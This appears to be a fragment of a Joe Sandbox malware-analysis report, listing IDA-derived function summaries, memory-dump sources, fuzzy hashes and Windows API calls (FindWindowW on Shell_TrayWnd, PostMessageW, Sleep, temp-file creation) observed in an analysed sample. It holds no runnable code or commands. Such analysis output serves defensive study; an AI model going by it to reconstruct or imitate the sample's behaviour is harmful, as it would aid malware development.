                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Temp$FileNamePath
                                                                • String ID: aut
                                                                • API String ID: 3285503233-3010740371
                                                                • Opcode ID: eb847fd4353cb9bd0810b029664d860a393e1454bbc85891bcc0aa76e21d8fd7
                                                                • Instruction ID: cbf477f88187c79d9d3513cbaf59f1be68f4653570ae434bcd81ae533c06db59
                                                                • Opcode Fuzzy Hash: eb847fd4353cb9bd0810b029664d860a393e1454bbc85891bcc0aa76e21d8fd7
                                                                • Instruction Fuzzy Hash: D9D05B7150031477DA2097949D0DFC73B6CD745750F0041527655D60D1DAB49544CAD4
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: LocalTime
                                                                • String ID: %.3d$X64
                                                                • API String ID: 481472006-1077770165
                                                                • Opcode ID: a552ed99f5cb52c4b628b71519f9491e361a476781d01d07ff585ed2f985b3aa
                                                                • Instruction ID: bea029d3b8c51399cbb27f3f30ca628d851bd635dcfd33f0c7dddd04998681f1
                                                                • Opcode Fuzzy Hash: a552ed99f5cb52c4b628b71519f9491e361a476781d01d07ff585ed2f985b3aa
                                                                • Instruction Fuzzy Hash: F4D017A1D18158EECBB096E0DC599BAB3BCBB08301F608462FD07A2040E73CCD08AB61
                                                                APIs
                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007A236C
                                                                • PostMessageW.USER32(00000000), ref: 007A2373
                                                                  • Part of subcall function 0077E97B: Sleep.KERNEL32 ref: 0077E9F3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: FindMessagePostSleepWindow
                                                                • String ID: Shell_TrayWnd
                                                                • API String ID: 529655941-2988720461
                                                                • Opcode ID: cc2eb4b37515c78ead3de7c3a44e6c04d111af179e59818920acb7cd5ba2dfe1
                                                                • Instruction ID: 622d9ce911a18c805707ce4a5be124e237ed1f35294dc1eabb9c8d22f34bf8d0
                                                                • Opcode Fuzzy Hash: cc2eb4b37515c78ead3de7c3a44e6c04d111af179e59818920acb7cd5ba2dfe1
                                                                • Instruction Fuzzy Hash: 35D012727C1310BBE665B770DC0FFC676149B56B10F1089567755EA1D0C9F8B801CA58
                                                                APIs
                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007A232C
                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 007A233F
                                                                  • Part of subcall function 0077E97B: Sleep.KERNEL32 ref: 0077E9F3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: FindMessagePostSleepWindow
                                                                • String ID: Shell_TrayWnd
                                                                • API String ID: 529655941-2988720461
                                                                • Opcode ID: 3f2ea37b47192f890c700f16b84d0a1c43774ec8507bda8869f77ee514fa8438
                                                                • Instruction ID: d162387247c83c955cb3b0aa8cd0b9108e651f9b138c9ec3e724971fee013fc8
                                                                • Opcode Fuzzy Hash: 3f2ea37b47192f890c700f16b84d0a1c43774ec8507bda8869f77ee514fa8438
                                                                • Instruction Fuzzy Hash: 9FD01276794310F7E664B770DC0FFC67A149B55B10F1089567759AA1D0C9F8B801CA58